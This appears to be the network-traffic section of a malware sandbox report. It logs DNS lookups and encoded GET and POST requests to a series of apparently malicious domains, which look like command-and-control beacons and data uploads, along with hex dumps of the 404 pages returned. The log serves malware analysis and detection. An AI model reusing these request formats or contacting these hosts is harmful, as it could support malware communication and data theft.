                Source: global trafficHTTP traffic detected: GET /9tt6/?bdi02je=R3jpuUkZ7EJX4jqjTcmTvUqnmsYgEhE9uoYGKZnTkeq/io5yCJ6WA6X9pqF204rzk7Rku8NUjH1PNJ500I+1+upb+vrNHTsmBA3bSTQzlk0fY+b/7g==&dZOh=OjIxv4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.deacapalla.onlineConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                Source: global trafficHTTP traffic detected: GET /bhgd/?bdi02je=DwyTInzmM2N6MB8bA7Kl2rVP63jkNCBYgQInoYuWZdnLNHmEAu6R7FKnDf8o91RvtQ4ecsZhKZdUKJWxgxNcuNlYaUz0Gu0z3h0NSBZTW/WoATRTDg==&dZOh=OjIxv4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.unlimitu.websiteConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                Source: global trafficHTTP traffic detected: GET /58m5/?dZOh=OjIxv4&bdi02je=d1pgFl5Hp+GE0WFWsNtmNdDn5tG/BYSJ7zzhJcA1CBHzR3dh5eCk2y1Rogmf0tN3zZBB6GTJ43iUX+nETgktO5t+JdjWSzaOjXca9ruuKiduGBOEEQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.dejikenkyu.cyouConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                Source: global trafficHTTP traffic detected: GET /lgqt/?dZOh=OjIxv4&bdi02je=MFLEYxMapfQGVvab2mlHik76Wq9wcc6WcK+9EDc9rbcpz4NQWkVXiWg1fs3lc2q3xV4dwTIV5BZ4nWHdDq3R5n+AFpmJ+Ly/L7LDS8t/ZQ+0r1kIoA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.031233226.xyzConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                Source: global trafficHTTP traffic detected: GET /nuxf/?bdi02je=6auJ0yMi6OdsOmW1PnEOwtKK+9KMlfd7htFlcJBIKY8nc6XduaXwfvOOo77xMmoGODzG8ol9XftCv+9phUBaDXIrAZJse5hp6wCZHpS5iNqkumbbXg==&dZOh=OjIxv4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.grimbo.boatsConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                Source: global trafficHTTP traffic detected: GET /m1if/?dZOh=OjIxv4&bdi02je=hiCoNEWGLC+Yg+zH5qyDJS8Tq+9V0ljPyONuz3p+KqtlUJtklaaxXDftOiQ9jJfXeExikA9YAACl/ybcrnRwiKLR5knuCHWqVGESqivBmZbTiOmCPw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.autonomousoid.proConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                Source: global trafficHTTP traffic detected: GET /74m3/?bdi02je=J07XWb6rRWuGJO5SkIECj5J69naqA0tAtwFpxaaB1F5KpFfZVTdv5vYkc6nIFzVKRu12SI0yHkyXUlDnhtlAoXgrV2iwEhrPt5IYDg3jm5H2VeGVpg==&dZOh=OjIxv4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.rpa.asiaConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                Source: global trafficDNS traffic detected: DNS query: www.einpisalpace.shop
                Source: global trafficDNS traffic detected: DNS query: www.deacapalla.online
                Source: global trafficDNS traffic detected: DNS query: www.unlimitu.website
                Source: global trafficDNS traffic detected: DNS query: www.366800008.xyz
                Source: global trafficDNS traffic detected: DNS query: www.dejikenkyu.cyou
                Source: global trafficDNS traffic detected: DNS query: www.nhengtai.net
                Source: global trafficDNS traffic detected: DNS query: www.031233226.xyz
                Source: global trafficDNS traffic detected: DNS query: www.grimbo.boats
                Source: global trafficDNS traffic detected: DNS query: www.autonomousoid.pro
                Source: global trafficDNS traffic detected: DNS query: www.rpa.asia
                Source: global trafficDNS traffic detected: DNS query: www.pitaloka.xyz
                Source: unknownHTTP traffic detected: POST /9tt6/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brHost: www.deacapalla.onlineConnection: closeCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedContent-Length: 196Origin: http://www.deacapalla.onlineReferer: http://www.deacapalla.online/9tt6/User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69Data Raw: 62 64 69 30 32 6a 65 3d 63 31 4c 4a 74 6a 51 44 6b 7a 42 73 7a 54 33 72 58 4b 50 73 77 31 71 79 38 74 41 6f 57 48 59 68 39 70 59 6c 41 4d 61 71 6d 50 69 49 72 5a 55 33 56 74 2b 42 4c 74 6d 43 6f 34 39 69 6f 61 37 39 7a 75 38 30 72 4b 74 58 6f 56 70 70 4a 72 67 71 69 4c 6d 4a 6c 72 34 2b 39 4a 54 4b 52 68 31 50 57 43 32 48 63 42 4d 76 73 56 6f 31 41 35 44 57 34 6b 76 47 73 31 4c 33 4f 41 6a 66 36 6c 4a 35 6c 34 71 38 4e 33 44 47 2b 68 4c 46 38 75 69 78 31 59 51 42 6d 4b 49 39 51 69 36 67 51 70 5a 61 77 43 77 5a 69 6a 6e 76 74 4b 67 77 6d 68 76 4a 56 63 78 31 66 78 6e 76 76 55 6f 35 Data Ascii: bdi02je=c1LJtjQDkzBszT3rXKPsw1qy8tAoWHYh9pYlAMaqmPiIrZU3Vt+BLtmCo49ioa79zu80rKtXoVppJrgqiLmJlr4+9JTKRh1PWC2HcBMvsVo1A5DW4kvGs1L3OAjf6lJ5l4q8N3DG+hLF8uix1YQBmKI9Qi6gQpZawCwZijnvtKgwmhvJVcx1fxnvvUo5
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 22:05:40 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Sun, 05 Jan 2025 21:39:02 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zHYkuChScjLcDK5ZwtnlnP2Kf6lNJjPQ7dvVf1pIG9awHfbKteh0uzwzQfpDXwJ6zvz%2F9KWVyiCWZwQlyg63i6EeuJX8n3hXMNEJ2OKHe5L017ynYeY4KHs5YP1w1AsmCS10fx0BQhc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ffff8443d1fc3ee-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1514&min_rtt=1514&rtt_var=757&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=486&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 35 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 6f 72 72 79 2c 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 22 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 Data Ascii: 591<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>404 &mdash; Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="Sorry, page not found"/> <style type="text/css">
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 22:06:10 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 22:06:12 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 22:06:15 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 22:06:17 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 22:06:59 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 22:07:02 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 22:07:04 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 22:07:07 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 22:07:13 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aRv5Eiw%2BuA0NsdnI0lIpjaA4pRK%2BSM%2Bgbr7k8NEJRGzr31dI97GzwQSjUaqtU2VdhkLa92octjvd%2BdeSjDlUhhH1N9b2AlMMvipzpUxQN4q%2FWPjc7iTOFBQIIXxE4tTlNmwl"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ffffa88f83c4322-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1792&min_rtt=1792&rtt_var=896&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=745&delivery_rate=0&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 